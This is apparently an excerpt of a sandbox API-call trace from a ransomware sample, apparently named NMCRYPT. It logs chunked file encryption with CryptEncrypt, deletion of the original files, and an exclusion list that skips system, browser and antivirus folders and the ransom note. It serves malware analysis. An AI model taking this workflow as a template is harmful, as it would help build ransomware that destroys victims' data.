lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.515] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.515] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.515] GetLastError () returned 0x0 [0147.515] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.515] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.515] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.515] GetLastError () returned 0x0 [0147.515] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.515] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.515] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.515] GetLastError () returned 0x0 [0147.515] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.515] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.515] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.515] GetLastError () returned 0x0 [0147.515] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.515] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.515] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.515] GetLastError () returned 0x0 [0147.516] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.516] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.516] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.516] GetLastError () returned 0x0 [0147.516] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.516] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.516] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.516] GetLastError () returned 0x0 [0147.516] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.516] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.516] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.516] GetLastError () returned 0x0 [0147.516] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.516] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x44, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x44, lpOverlapped=0x0) returned 1 [0147.516] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x44, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x50) returned 1 [0147.516] GetLastError () returned 0x0 [0147.516] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x50, lpOverlapped=0x0) returned 1 [0147.516] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.516] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.517] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml")) returned 0x20 [0147.517] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml", dwFileAttributes=0x20) returned 0 [0147.517] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml") returned 1 [0147.517] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml")) returned 0 [0147.518] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml" [0147.518] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.518] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB31D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb31d.tmp")) returned 0xb31d [0147.518] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB31D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb31d.tmp"), dwFlags=0x1) returned 0 [0147.518] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB31D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb31d.tmp")) returned 1 [0147.519] CryptDestroyKey (hKey=0x9ad338) returned 1 [0147.519] wcslen (_String="OK") returned 0x2 [0147.519] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.519] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.519] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0147.519] CryptDestroyHash (hHash=0x9ad138) returned 1 [0147.519] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0147.519] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.519] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*NMCRYPT") returned 0 [0147.519] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*Recovers your files.html") returned 0 [0147.519] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*.exe") returned 0 [0147.519] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*.dll") returned 0 [0147.519] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*.lnk") returned 0 [0147.519] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*.bat") returned 0 [0147.519] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*.ini") returned 0 [0147.519] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*.msi") returned 0 [0147.519] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*.scf") returned 0 [0147.519] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*pagefile.sys*") returned 0 [0147.519] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.519] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*AppData*") returned 0 [0147.519] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*\\winrar\\*") returned 0 [0147.519] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.519] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*\\java\\*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*\\windows\\*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*\\ESET\\*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*\\AVG\\*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*Atheros*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*Realtek*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*bootmgr*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*boot*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*boot*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*IO.SYS*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*ntldr*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*chrome*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*opera*") returned 0 [0147.520] PathMatchSpecW (pszFile="ipshe.xml", pszSpec="*firefox*") returned 0 [0147.520] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml", pszSpec="*") returned 1 [0147.520] strlen (_Str="NMoreira") returned 0x8 [0147.520] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.520] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.520] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.520] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.520] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.520] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.520] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.520] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.520] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.520] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.520] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.520] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.521] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.522] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.523] CryptGenRandom (in: hProv=0x8bf310, 